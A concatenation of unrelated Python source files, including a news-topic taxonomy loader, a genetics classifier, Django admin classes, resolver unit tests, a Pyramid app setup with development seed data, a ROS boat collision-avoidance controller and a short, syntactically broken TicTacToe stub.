2|3.1. Conflict, Political Violence - Demonstration, Protests, War|3. Conflict, Political Violence
2|4.1. Crime - Murder, robbery, hijacking, theft, Corruption-bribery, fraud at both government and corporate levels|4. Crime
2|5.1. Cultural practices and traditions|5. Cultural practicies and traditions
2|6.1. Development - Policies, projects|6. Development
2|7.1. Disabilities-mental or physical|7. Disabilities
2|8.1. Disaster/Accident - Earthquakes, famine, typhoons, accidents, tragedy|8. Disaster/Accident
2|9.1. Economics - Includes business, corporate news, finance issues, trade agreements|9. Economics
2|10.1. Education General - where the codes below do not apply.|10. Education
2|10.2. Policy related: state of schools, education policies, etc.|10. Education
2|10.3. Events and Achievements: school fun days, awards etc.|10. Education
2|10.4. Violence: levels of violence among learners and school related disasters and tragedies.|10. Education
2|11.1. Environment - Pollution, extinction of animal/plant species|11. Environment
2|12.1. Family-reports on values, the ideal family or focus on a specific family|12. Family
2|13.1. Funds-monies donated for the treatment of HIV|13. Funds
2|14.1. Gender - where the central focus of the story is on a gender related element.|14. Gender
2|15.1. Health - general health issues, diabetes, cancer, nutrition, excludes HIV/AIDS|15. Health
2|16.1. Aids Orphans/children affected by HIV, where children have parents/caregivers due to HIV/AIDS|16. HIV/AIDS
2|16.2. Treatment of HIV/AIDS-items relating to ARVs or nevirapine or treatment in general|16. HIV/AIDS
2|16.3. Sex Education-items on practicing safe sex in relation to HIV/AIDS and in STD's|16. HIV/AIDS
2|16.4. HIV/AIDS - general when other codes don't apply|16. HIV/AIDS
2|17.1. Housing - Includes policies, lack of housing, government initiatives|17. Housing
2|18.1. Human Rights-includes a variety of rights|18. Human Rights
2|19.1. Justice system - Court rulings, constitutional issues, legislation, bills, amendments, judicial system|19. Justice System
2|20.1. Media and arts - New media, freedom of expression, entertainment, culture-theatre, lifestyle issues, fashion, religion and tradition|20. Media and Arts
2|21.1. Personalities/Profiles - Features on prominent personalities or upcoming people|21. Personalities/Profiles
2|22.1. Politics (International) - Diplomacy efforts, political news from outside South Africa|22. Politics
2|22.2. SA National Politics - Includes SA Gov & Parliament-national government, national issues, parliament, national politics|22. Politics
2|22.3. Provincial & Local Govt - Includes municipalities, policies affecting only certain provinces, local government finance|22. Politics
2|23.1. Poverty Rate - Policies|23. Poverty rate
2|24.1. Racism & Xenophobia- incidents of racism & discrimination based on a person's ethnicity or nationality|24. Racism and Xenophobia
2|25.1. Refugee children-asylum seekers, refugees rights|25. Refugee Children
2|26.1. Science-reports about new inventions, technology|26. Science
2|27.1. Social Welfare - Policies on welfare grants, pension, child grants|27. Social Welfare
2|28.1. Sport - news on sport events, reports, athletes, policies|28. Sports
2|29.1. Substance Abuse-drugs and alcohol|29. Substance Abuse
2|30.1. Teenage pregnancy|30. Teenage Pregnancy
2|31.1. Other- to be used as a last resort|31. Other
"""
from .analysis_nature import AnalysisNature
natures = {n.id: n for n in AnalysisNature.all()}
topics = []
for s in text.strip().split("\n"):
parts = s.split("|")
t = Topic()
t.analysis_natures = [natures[int(parts[0])]]
t.name = parts[1].strip()
if len(parts) > 2:
t.group = parts[2].strip()
topics.append(t)
return topics
class DocumentTaxonomy(db.Model):
"""
Taxonomy classification for documents, from AlchemyAPI.
"""
__tablename__ = "document_taxonomies"
id = Column(Integer, primary_key=True)
doc_id = Column(Integer, ForeignKey('documents.id', ondelete='CASCADE'), index=True)
label = Column(String(200), index=True, nullable=False)
score = Column(Float, index=True, nullable=False)
def __repr__(self):
return "<DocumentTaxonomy label='%s', score=%f, doc=%s>" % (
self.label.encode('utf-8'), self.score, self.document)
@classmethod
def summary_for_docs(cls, doc_ids):
""" Summary of document taxonomies.
"""
return db.session.query(
cls.label,
func.count(1).label('freq'))\
.filter(cls.doc_id.in_(doc_ids))\
.group_by(cls.label)\
.order_by(desc('freq'), cls.label)\
.all()
|
import common
import pandas as pd
from os import path, linesep
from sklearn.linear_model import SGDClassifier
def build_model(data_set, data_split, no_interactions, negative, max_snps, cross_validation, output_dir):
"""
Builds a model using logistic regression and an elastic net penalty
:param data_set: The feature data set
:param data_split: The percentage of data to use for testing the model
:param no_interactions: If True interactions will not be included in the model
:param negative: The negative phenotype label
:param max_snps: The maximum number of SNPs for the model to include
:param output_dir: The directory to write the model to
"""
l1_ratio = 0
l1_ratios = []
step_size = 0.05
while l1_ratio < 1:
l1_ratios.append(l1_ratio)
l1_ratio += step_size
param_grid = {'l1_ratio': l1_ratios}
model_eval = {
'roc': get_roc_probs,
'features': save_features
}
common.build_model(
data_set,
data_split,
no_interactions,
negative,
SGDClassifier(
loss="log", penalty="elasticnet", random_state=1, n_jobs=-1, max_iter=1000, tol=1e-3),
cross_validation,
max_snps,
output_dir,
param_grid,
model_eval
)
def get_roc_probs(model, x_test):
"""
Gets the prediction probabilities to generate an ROC curve
:param model: The trained model
:param x_test: The test data
:return: The prediction probabilities for the test data
"""
return model.decision_function(x_test)
def save_features(model, term_labels, output_dir):
"""
Saves the features ordered by influence. The reason the coefficients can be used to determine feature importance
is because all feature data is scaled to be the same range before training the model.
:param model: The trained model
:param term_labels: The model term labels
:param output_dir: The directory to write the features to
"""
features = pd.DataFrame({'feature': term_labels, 'coefficient': model.coef_.ravel()})
features['coef_abs'] = features['coefficient'].abs()
features = features[features['coef_abs'] > 0]
features.sort_values(ascending=False, inplace=True, by='coef_abs')
features.drop('coef_abs', axis=1, inplace=True)
with file(path.join(output_dir, 'model_features.csv'), 'w') as f:
f.write('intercept: {}{}{}'.format(model.intercept_[0], linesep, linesep))
# main effects
f.write('{}main effects:{}'.format(linesep, linesep))
main_effects = features['feature'].str.contains(':')
features[~main_effects].to_csv(f, index=False)
# interactions
f.write('{}interaction effects:{}'.format(linesep, linesep))
features[main_effects].to_csv(f, index=False)
|
from django.contrib import admin
from django.db.models import JSONField
from django_krules_procevents.widgets import ReadOnlyJSONWidget
from .models import Fleet, ReceivedData, LocationTrackerService, LocationTrackerData
@admin.register(Fleet)
class FleetAdmin(admin.ModelAdmin):
readonly_fields = ["endpoint", "dashboard"]
@admin.register(ReceivedData)
class ReceivedDataAdmin(admin.ModelAdmin):
list_display = ['owner', 'device', 'timestamp']
search_fields = ['device']
list_filter = ['owner']
readonly_fields = ['device', 'owner', 'timestamp']
formfield_overrides = {
JSONField: {'widget': ReadOnlyJSONWidget()},
}
def has_add_permission(self, request):
return False
@admin.register(LocationTrackerService)
class LocationTrackerServiceAdmin(admin.ModelAdmin):
list_display = ["name", "maintenance"]
list_editable = ["maintenance"]
def has_add_permission(self, request):
return False
@admin.register(LocationTrackerData)
class LocationTrackerServiceAdmin(admin.ModelAdmin):
list_display = ["owner", "device", "location", "coords", "timestamp"]
readonly_fields = ["owner", "device", "location", "coords", "timestamp"]
search_fields = ["owner", "device"]
list_filter = ["owner", "device"]
def has_add_permission(self, request):
return False
|
def swap(vet, i, menor):
aux = vet[i]
vet[i] = vet[menor]
vet[menor] = aux
def selectionSort(vet):
for i in range(len(vet)):
menor = i
for j in range(i+1, len(vet)):
if vet[j] < vet[menor]:
menor = j
if i != menor:
swap(vet, i, menor)
return vet
def main():
vet = [6, 3, 4, 5, 2, 7, 1, 9, 8, 0]
print(selectionSort(vet))
if __name__ == '__main__':
main() |
import sys
if sys.version_info >= (3, 8):
from unittest import IsolatedAsyncioTestCase as TestCase
from unittest.mock import AsyncMock
else:
from unittest import TestCase
from asynctest.mock import CoroutineMock as AsyncMock
from unittest.mock import Mock, call, sentinel
import pytest
from jj.apps import create_app
from jj.resolvers import Registry, Resolver
class TestResolver(TestCase):
def setUp(self):
self.default_handler = AsyncMock(return_value=sentinel.default_response)
self.default_app = create_app()
self.resolver = Resolver(Registry(), self.default_app, self.default_handler)
# Apps
def test_get_apps(self):
apps = self.resolver.get_apps()
self.assertEqual(apps, [])
def test_register_app(self):
res = self.resolver.register_app(type(self.default_app))
self.assertIsNone(res)
apps = self.resolver.get_apps()
self.assertEqual(apps, [type(self.default_app)])
def test_register_another_app(self):
self.resolver.register_app(type(self.default_app))
app = create_app()
self.resolver.register_app(type(app))
apps = self.resolver.get_apps()
self.assertEqual(apps, [type(self.default_app), type(app)])
def test_register_app_twice(self):
self.resolver.register_app(type(self.default_app))
res = self.resolver.register_app(type(self.default_app))
self.assertIsNone(res)
apps = self.resolver.get_apps()
self.assertEqual(apps, [type(self.default_app)])
def test_deregister_single_app(self):
self.resolver.register_app(type(self.default_app))
res = self.resolver.deregister_app(type(self.default_app))
self.assertIsNone(res)
apps = self.resolver.get_apps()
self.assertEqual(apps, [])
def test_deregister_app(self):
app1, app2 = create_app(), create_app()
self.resolver.register_app(type(app1))
self.resolver.register_app(type(app2))
self.resolver.deregister_app(type(app1))
apps = self.resolver.get_apps()
self.assertEqual(apps, [type(app2)])
def test_deregister_nonexisting_app(self):
app = create_app()
res = self.resolver.deregister_app(type(app))
self.assertIsNone(res)
# Handlers
def test_get_handlers(self):
handlers = self.resolver.get_handlers(type(self.default_app))
self.assertEqual(handlers, [])
def test_get_handlers_with_nonexisting_app(self):
app = create_app()
handlers = self.resolver.get_handlers(type(app))
self.assertEqual(handlers, [])
def test_register_handler(self):
handler = AsyncMock(return_value=sentinel.response)
res = self.resolver.register_handler(handler, type(self.default_app))
self.assertIsNone(res)
handlers = self.resolver.get_handlers(type(self.default_app))
self.assertEqual(handlers, [handler])
def test_register_another_handler(self):
handler1 = AsyncMock(return_value=sentinel.response)
handler2 = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler1, type(self.default_app))
self.resolver.register_handler(handler2, type(self.default_app))
handlers = self.resolver.get_handlers(type(self.default_app))
self.assertEqual(handlers, [handler1, handler2])
def test_register_handler_twice(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
res = self.resolver.register_handler(handler, type(self.default_app))
self.assertIsNone(res)
handlers = self.resolver.get_handlers(type(self.default_app))
self.assertEqual(handlers, [handler])
def test_deregister_single_handler(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
res = self.resolver.deregister_handler(handler, type(self.default_app))
self.assertIsNone(res)
handlers = self.resolver.get_handlers(type(self.default_app))
self.assertEqual(handlers, [])
def test_deregister_handler(self):
handler1 = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler1, type(self.default_app))
handler2 = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler2, type(self.default_app))
self.resolver.deregister_handler(handler1, type(self.default_app))
handlers = self.resolver.get_handlers(type(self.default_app))
self.assertEqual(handlers, [handler2])
def test_deregister_nonexisting_handler(self):
handler = AsyncMock(return_value=sentinel.response)
res = self.resolver.deregister_handler(handler, type(self.default_app))
self.assertIsNone(res)
def test_deregister_handler_with_nonexisting_app(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
app = create_app()
res = self.resolver.deregister_handler(handler, type(app))
self.assertIsNone(res)
# Attributes
def test_get_nonexisting_attribute(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
attribute_value = self.resolver.get_attribute(sentinel.name, handler)
self.assertEqual(attribute_value, sentinel)
def test_get_attribute_with_non_existing_handler(self):
handler = AsyncMock(return_value=sentinel.response)
default = None
attribute_value = self.resolver.get_attribute(sentinel.name, handler, default)
self.assertEqual(attribute_value, default)
def test_register_attribute(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
res = self.resolver.register_attribute(sentinel.name, sentinel.value, handler)
self.assertIsNone(res)
attribute_value = self.resolver.get_attribute(sentinel.name, handler)
self.assertEqual(attribute_value, sentinel.value)
def test_register_another_attribute(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
self.resolver.register_attribute(sentinel.name1, sentinel.value1, handler)
self.resolver.register_attribute(sentinel.name2, sentinel.value2, handler)
attribute_value2 = self.resolver.get_attribute(sentinel.name2, handler)
self.assertEqual(attribute_value2, sentinel.value2)
attribute_value1 = self.resolver.get_attribute(sentinel.name1, handler)
self.assertEqual(attribute_value1, sentinel.value1)
def test_register_attribute_twice(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
self.resolver.register_attribute(sentinel.name1, sentinel.value1, handler)
res = self.resolver.register_attribute(sentinel.name, sentinel.value, handler)
self.assertIsNone(res)
attribute_value = self.resolver.get_attribute(sentinel.name, handler)
self.assertEqual(attribute_value, sentinel.value)
def test_deregister_attribute(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
self.resolver.register_attribute(sentinel.name, sentinel.value, handler)
res = self.resolver.deregister_attribute(sentinel.name, handler)
self.assertIsNone(res)
attribute_value = self.resolver.get_attribute(sentinel.name, handler, default=None)
self.assertEqual(attribute_value, None)
def test_deregister_nonexisting_attribute(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
res = self.resolver.deregister_attribute(sentinel.name, handler)
self.assertIsNone(res)
def test_deregister_attribute_with_nonexisting_handler(self):
handler = AsyncMock(return_value=sentinel.response)
res = self.resolver.deregister_attribute(sentinel.name, handler)
self.assertIsNone(res)
# Matchers
def test_get_matchers_without_matchers(self):
matchers = self.resolver.get_matchers(self.default_handler)
self.assertEqual(matchers, [])
def test_get_matchers_with_one_matcher(self):
matcher = AsyncMock(return_value=True)
self.resolver.register_matcher(matcher, self.default_handler)
matchers = self.resolver.get_matchers(self.default_handler)
self.assertEqual(matchers, [matcher])
def test_get_matchers_with_multiple_matchers(self):
matcher1 = AsyncMock(return_value=True)
matcher2 = AsyncMock(return_value=True)
self.resolver.register_matcher(matcher1, self.default_handler)
self.resolver.register_matcher(matcher2, self.default_handler)
matchers = self.resolver.get_matchers(self.default_handler)
self.assertEqual(matchers, [matcher1, matcher2])
def test_register_matcher(self):
handler = AsyncMock(return_value=sentinel.response)
matcher = AsyncMock(return_value=True)
self.assertIsNone(self.resolver.register_matcher(matcher, handler))
def test_deregister_matcher(self):
handler = AsyncMock(return_value=sentinel.response)
matcher = AsyncMock(return_value=True)
self.resolver.register_matcher(matcher, handler)
res = self.resolver.deregister_matcher(matcher, handler)
self.assertIsNone(res)
matchers = self.resolver.get_matchers(handler)
self.assertEqual(matchers, [])
def test_deregister_matcher_with_nonexisting_handler(self):
handler = AsyncMock(return_value=sentinel.response)
matcher = AsyncMock(return_value=True)
res = self.resolver.deregister_matcher(matcher, handler)
self.assertIsNone(res)
# Resolver
@pytest.mark.asyncio
async def test_resolve_request_with_all_truthy_matchers(self):
handler = AsyncMock(return_value=sentinel.response)
matcher1 = AsyncMock(return_value=True)
matcher2 = AsyncMock(return_value=True)
self.resolver.register_matcher(matcher1, handler)
self.resolver.register_matcher(matcher2, handler)
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, handler)
matcher1.assert_called_once_with(request)
matcher2.assert_called_once_with(request)
handler.assert_not_called()
@pytest.mark.asyncio
async def test_resolve_request_with_all_falsy_matchers(self):
handler = AsyncMock(return_value=sentinel.response)
matcher1 = AsyncMock(return_value=False)
matcher2 = AsyncMock(return_value=False)
self.resolver.register_matcher(matcher1, handler)
self.resolver.register_matcher(matcher2, handler)
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, self.default_handler)
matcher1.assert_called_once_with(request)
matcher2.assert_not_called()
handler.assert_not_called()
@pytest.mark.asyncio
async def test_resolve_request_with_first_falsy_matcher(self):
handler = AsyncMock(return_value=sentinel.response)
matcher1 = AsyncMock(return_value=False)
matcher2 = AsyncMock(return_value=True)
self.resolver.register_matcher(matcher1, handler)
self.resolver.register_matcher(matcher2, handler)
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, self.default_handler)
matcher1.assert_called_once_with(request)
matcher2.assert_not_called()
handler.assert_not_called()
@pytest.mark.asyncio
async def test_resolve_request_with_last_falsy_matcher(self):
handler = AsyncMock(return_value=sentinel.response)
matcher1 = AsyncMock(return_value=True)
matcher2 = AsyncMock(return_value=False)
self.resolver.register_matcher(matcher1, handler)
self.resolver.register_matcher(matcher2, handler)
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, self.default_handler)
matcher1.assert_called_once_with(request)
matcher2.assert_called_once_with(request)
handler.assert_not_called()
@pytest.mark.asyncio
async def test_resolve_request_without_handlers(self):
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, self.default_handler)
@pytest.mark.asyncio
async def test_resolve_request_with_nonexisting_app(self):
app = create_app()
request = Mock()
response = await self.resolver.resolve(request, app)
self.assertEqual(response, self.default_handler)
@pytest.mark.asyncio
async def test_resolve_request_without_matchers(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, self.default_handler)
@pytest.mark.asyncio
async def test_resolve_request_with_single_matcher(self):
handler = AsyncMock(return_value=sentinel.response)
matcher = AsyncMock(return_value=True)
self.resolver.register_matcher(matcher, handler)
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, handler)
matcher.assert_called_once_with(request)
handler.assert_not_called()
@pytest.mark.asyncio
async def test_resolve_request_with_multiple_handlers(self):
matcher = AsyncMock(side_effect=(False, True))
handler1 = AsyncMock(return_value=sentinel.response1)
handler2 = AsyncMock(return_value=sentinel.response2)
self.resolver.register_matcher(matcher, handler1)
self.resolver.register_matcher(matcher, handler2)
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, handler1)
handler1.assert_not_called()
handler2.assert_not_called()
matcher.assert_has_calls([call(request)] * 2, any_order=True)
self.assertEqual(matcher.call_count, 2)
@pytest.mark.asyncio
async def test_resolve_request_priority(self):
matcher = AsyncMock(side_effect=(True, True))
handler1 = AsyncMock(return_value=sentinel.response1)
handler2 = AsyncMock(return_value=sentinel.response2)
self.resolver.register_matcher(matcher, handler1)
self.resolver.register_matcher(matcher, handler2)
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, handler2)
handler1.assert_not_called()
handler2.assert_not_called()
matcher.assert_called_once_with(request)
|
import gameBoard
def main():
print('Welcome to TicTacToe')
askingToPlay = input('Do you want to play again? (Type yes or no)'.lower())
if askingToPlay != 'yes':
run game
while playAgain == 'yes':
pass
'''
runGame
'''
print("i love johnson")
|
import datetime
import logging.config
import transaction
from pyramid.config import Configurator
from pyramid.authentication import AuthTktAuthenticationPolicy
from pyramid.authorization import ACLAuthorizationPolicy
from pyramid.session import SignedCookieSessionFactory
from sqlalchemy import engine_from_config
from whoahqa.constants import permissions as perms
from whoahqa.constants import groups
from utils import (
hashid,
enketo,
format_date_for_locale,
format_location_name,
round_or_none)
from whoahqa.security import group_finder, pwd_context
from whoahqa.models import (
DBSession,
Base,
Clinic,
Group,
LocationFactory,
Municipality,
OnaUser,
State,
User,
UserProfile,
UserFactory,
ClinicFactory,
SubmissionFactory,
ReportingPeriod,
ReportingPeriodFactory,
)
from whoahqa.views import (
get_request_user,
can_access_clinics,
can_list_clinics,
can_view_clinics,
can_view_municipality,
can_create_period,
can_view_state,
can_list_state,
is_super_user
)
DEVELOPMENT_ENV = "development"
def main(global_config, **settings):
""" This function returns a Pyramid WSGI application.
"""
engine = engine_from_config(settings, 'sqlalchemy.')
DBSession.configure(bind=engine)
Base.metadata.bind = engine
session_factory = SignedCookieSessionFactory(
settings['secret_key'])
config = Configurator(settings=settings,
root_factory='whoahqa.models.RootFactory',
session_factory=session_factory)
config.set_authentication_policy(
AuthTktAuthenticationPolicy(settings['secret_key'],
callback=group_finder,
hashalg='sha512'))
config.set_authorization_policy(ACLAuthorizationPolicy())
config.set_default_permission(perms.AUTHENTICATED)
# Add custom renderers
config.add_renderer('csv', 'whoahqa.renderers.CSVRenderer')
# Add request object helpers
add_request_helpers(config)
# setup the hashid salt
hashid._salt = settings['hashid_salt']
# add locale directory to project configuration
config.add_translation_dirs('whoahqa:locale')
# configure enketo
enketo.configure(
settings['enketo_url'],
settings['enketo_api_token'])
logging.config.fileConfig(
global_config['__file__'], disable_existing_loggers=False)
# configure password context
pwd_context.load_path(global_config['__file__'])
includeme(config)
if settings.get("environment", "") == DEVELOPMENT_ENV:
setup_development_data()
return config.make_wsgi_app()
def includeme(config):
config.include('pyramid_jinja2')
config.commit()
config.add_jinja2_search_path("whoahqa:templates")
config.get_jinja2_environment().filters['format_date'] = \
format_date_for_locale
config.get_jinja2_environment().filters['format_location_name'] = \
format_location_name
config.get_jinja2_environment().filters['round_or_none'] = round_or_none
config.add_static_view('static', 'static', cache_max_age=3600)
config.add_route('default', '/')
config.add_route('logout', '/logout/')
config.add_route('push', '/push/{action}')
config.add_route('locale', '/locale/')
config.add_route('admin', '/admin/*traverse', factory=UserFactory)
config.add_route('auth', '/auth/{action}')
config.add_route('users', '/users/*traverse',
factory=UserFactory)
config.add_route('clinics', '/clinics/*traverse',
factory=ClinicFactory)
config.add_route('submissions', '/submissions/*traverse',
factory=SubmissionFactory)
config.add_route('periods', '/reporting-periods/*traverse',
factory=ReportingPeriodFactory)
config.add_route('municipalities', '/municipalities/*traverse',
factory=LocationFactory)
config.add_route('states', '/states/*traverse',
factory=LocationFactory)
config.add_route('locations', '/locations/*traverse',
factory=LocationFactory)
config.scan()
def add_request_helpers(config):
# add .user to requests and cache it with reify
config.add_request_method(get_request_user, 'user', reify=True)
config.add_request_method(
can_access_clinics, 'can_access_clinics', reify=True)
config.add_request_method(can_view_clinics, 'can_view_clinics', reify=True)
config.add_request_method(can_list_clinics, 'can_list_clinics', reify=True)
config.add_request_method(
can_view_municipality, 'can_view_municipality', reify=True)
config.add_request_method(
can_create_period, 'can_create_period', reify=True)
config.add_request_method(can_view_state, 'can_view_state', reify=True)
config.add_request_method(can_list_state, 'can_list_state', reify=True)
config.add_request_method(is_super_user, 'is_super_user', reify=True)
def setup_development_data():
with transaction.manager:
setup_users()
setup_clinics()
setup_default_reporting_period()
def setup_users():
group_criteria = Group.name == groups.SUPER_USER
group_params = {'name': groups.SUPER_USER}
su_group = Group.get_or_create(
group_criteria,
**group_params)
su = User()
user_profile_criteria = UserProfile.username == 'admin'
user_profile_params = {
'user': su,
'username': 'admin',
'password': 'admin'}
profile = UserProfile.get_or_create(
user_profile_criteria,
**user_profile_params)
ona_user_params = {
'user': su,
'username': 'admin',
'refresh_token': '123456'}
ona_user = OnaUser.get_or_create(
OnaUser.username == "admin",
**ona_user_params)
su.group = su_group
profile.save()
ona_user.save()
def setup_clinics():
# add a couple of clinics
state_params = {'name': "Acre"}
state = State.get_or_create(
State.name == state_params['name'],
**state_params)
municipality_params = {'name': 'Brasilia',
'parent': state}
municipality = Municipality.get_or_create(
Municipality.name == municipality_params['name'],
**municipality_params)
clinic_criteria = Clinic.name == "Clinic A"
clinic_params = {
"name": "Clinic A",
"code": "1A2B",
"municipality": municipality}
clinic_a = Clinic.get_or_create(
clinic_criteria,
**clinic_params)
clinic_a.save()
clinic_params = {
"name": "Clinic b",
"code": "1B2C",
"municipality": municipality}
clinic_b = Clinic.get_or_create(
clinic_criteria,
**clinic_params)
clinic_b.save()
user = OnaUser.get(OnaUser.username == 'admin').user
clinic_a.assign_to(user)
clinic_b.assign_to(user)
def setup_default_reporting_period():
title = 'Dev Period'
params = {
"title": title,
"start_date": datetime.datetime(2014, 11, 5),
"end_date": datetime.datetime(2014, 11, 30)
}
reporting_period = ReportingPeriod.get_or_create(
ReportingPeriod.title == title,
**params)
reporting_period.save()
|
#!/usr/bin/env python
import rospy
from duckiepond_vehicle.msg import UsvDrive
from sensor_msgs.msg import NavSatFix,Imu
from nav_msgs.msg import Odometry
from RVO import RVO_update, reach, compute_V_des, reach
from PID import PID_control
from dynamic_reconfigure.server import Server
from control.cfg import ang_PIDConfig,dis_PIDConfig
import math
import tf
class BoatHRVO(object):
def __init__(self):
self.node_name = rospy.get_name()
rospy.loginfo("[%s] Initializing" %self.node_name)
#initiallize PID
self.dis_pid = [PID_control("distance_control%d" % i) for i in range(4)]
self.angu_pid = [PID_control("angular_control%d" % i) for i in range(4)]
self.dis_server = Server(dis_PIDConfig,self.cb_dis_pid,"distance_control")
self.ang_server = Server(ang_PIDConfig,self.cb_ang_pid,"angular_control")
for i in range(4):
self.dis_pid[i].setSampleTime(0.1)
self.angu_pid[i].setSampleTime(0.1)
self.dis_pid[i].SetPoint = 0
self.angu_pid[i].SetPoint = 0
#setup publisher
self.pub_v1 = rospy.Publisher("/boat1/cmd_drive",UsvDrive,queue_size=1)
self.sub_p3d1 = rospy.Subscriber("/boat1/p3d_odom",Odometry,self.cb_boat1_odom,queue_size=1)
self.pub_v2 = rospy.Publisher("/boat2/cmd_drive",UsvDrive,queue_size=1)
self.sub_p3d1 = rospy.Subscriber("/boat2/p3d_odom",Odometry,self.cb_boat2_odom,queue_size=1)
self.pub_v3 = rospy.Publisher("/boat3/cmd_drive",UsvDrive,queue_size=1)
self.sub_p3d1 = rospy.Subscriber("/boat3/p3d_odom",Odometry,self.cb_boat3_odom,queue_size=1)
self.pub_v4 = rospy.Publisher("/boat4/cmd_drive",UsvDrive,queue_size=1)
self.sub_p3d1 = rospy.Subscriber("/boat4/p3d_odom",Odometry,self.cb_boat4_odom,queue_size=1)
#initiallize boat status
self.boat_odom = [Odometry() for i in range(4)]
self.cmd_drive = [UsvDrive() for i in range(4)]
self.yaw = [0 for i in range(4)]
#initiallize HRVO environment
self.ws_model = dict()
#robot radius
self.ws_model['robot_radius'] = 3
self.ws_model['circular_obstacles'] = []
#rectangular boundary, format [x,y,width/2,heigth/2]
self.ws_model['boundary'] = []
self.pin1 = [7.5,7.5]
self.pin2 = [-7.5,7.5]
self.pin3 = [-7.5,-7.5]
self.pin4 = [7.5,-7.5]
self.position = []
self.goal = [self.pin3,self.pin4,self.pin1,self.pin2]
#print(self.position)
#print(self.goal)
self.velocity = [[0,0] for i in range(4)]
self.velocity_detect = [[0,0] for i in range(4)]
self.v_max = [1 for i in range(4)]
#timer
self.timer = rospy.Timer(rospy.Duration(0.2),self.cb_hrvo)
def cb_hrvo(self,event):
self.update_all()
v_des = compute_V_des(self.position,self.goal,self.v_max)
self.velocity = RVO_update(self.position,v_des,self.velocity_detect,self.ws_model)
#print("position",self.position)
#print("velocity",self.velocity)
info = [[0,0] for i in range(4)]
for i in range(4):
dis , angle = self.process_ang_dis(self.velocity[i][0],self.velocity[i][1],self.yaw[i])
#self.dis_pid[i].update(dis)
self.angu_pid[i].update(angle)
#dis_out = max(min(self.dis_pid[i].output,1),-1) * -1
dis_out = max(min(dis,1),-1)
ang_out = max(min(self.angu_pid[i].output,1),-1)
#print(i,dis_out,ang_out)
self.cmd_drive[i] = self.control_cmd_drive(dis_out, ang_out)
info[i][0] = self.cmd_drive[i].left
info[i][1] = self.cmd_drive[i].right
#print(info)
self.pub_v1.publish(self.cmd_drive[0])
self.pub_v2.publish(self.cmd_drive[1])
self.pub_v3.publish(self.cmd_drive[2])
self.pub_v4.publish(self.cmd_drive[3])
def control_cmd_drive(self,dis,angle):
cmd = UsvDrive()
cmd.left = max(min(dis - angle,1),-1)
cmd.right = max(min(dis + angle,1),-1)
return cmd
def process_ang_dis(self,vx,vy,yaw):
dest_yaw = math.atan2(vy,vx)
if dest_yaw > yaw:
right_yaw = dest_yaw-yaw
left_yaw = (2*math.pi-right_yaw)*-1
else:
left_yaw = dest_yaw-yaw
right_yaw = (2*math.pi-(left_yaw*-1))
#-1 < angle < 1 , find close side to turn
angle = left_yaw if abs(left_yaw) < abs(right_yaw) else right_yaw
angle = angle/math.pi
dis = (((1 - abs(angle))-0.5) * 2) * pow(vx*vx + vy*vy,0.5)
dis = max(min(dis,1),-1)
angle = max(min(angle,1),0)
return dis , angle
def update_all(self):
self.position = []
for i in range(4):
#update position
pos = [self.boat_odom[i].pose.pose.position.x,self.boat_odom[i].pose.pose.position.y]
self.position.append(pos)
#update orientation
quaternion = (self.boat_odom[i].pose.pose.orientation.x,
self.boat_odom[i].pose.pose.orientation.y,
self.boat_odom[i].pose.pose.orientation.z,
self.boat_odom[i].pose.pose.orientation.w)
euler = tf.transformations.euler_from_quaternion(quaternion)
self.yaw[i] = euler[2]
#update velocity
self.velocity_detect[i] = [self.boat_odom[i].twist.twist.linear.x,
self.boat_odom[i].twist.twist.linear.y]
#print("\nboat%d" % i)
#print(self.position[i])
#print(self.yaw[i])
#print(self.velocity[i])
def cb_boat1_odom(self,msg):
self.boat_odom[0] = msg
def cb_boat2_odom(self,msg):
self.boat_odom[1] = msg
def cb_boat3_odom(self,msg):
self.boat_odom[2] = msg
def cb_boat4_odom(self,msg):
self.boat_odom[3] = msg
def cb_dis_pid(self,config,level):
print("distance: [Kp]: {Kp} [Ki]: {Ki} [Kd]: {Kd}\n".format(**config))
Kp = float("{Kp}".format(**config))
Ki = float("{Ki}".format(**config))
Kd = float("{Kd}".format(**config))
for i in range(4):
self.dis_pid[i].setKp(Kp)
self.dis_pid[i].setKi(Ki)
self.dis_pid[i].setKd(Kd)
return config
def cb_ang_pid(self,config,level):
print("angular: [Kp]: {Kp} [Ki]: {Ki} [Kd]: {Kd}\n".format(**config))
Kp = float("{Kp}".format(**config))
Ki = float("{Ki}".format(**config))
Kd = float("{Kd}".format(**config))
for i in range(4):
self.angu_pid[i].setKp(Kp)
self.angu_pid[i].setKi(Ki)
self.angu_pid[i].setKd(Kd)
return config
if __name__ == "__main__":
rospy.init_node("BoatHRVO")
boatHRVO = BoatHRVO()
rospy.spin()
|
from typing import List
from garage.garage import Garage
from garage.parking_level import ParkingLevel
from garage.parking_space import ParkingSpace
from garage.vehicle import Vehicle
from garage.vehicle_type import VehicleType
from test.utils import TestHelpers
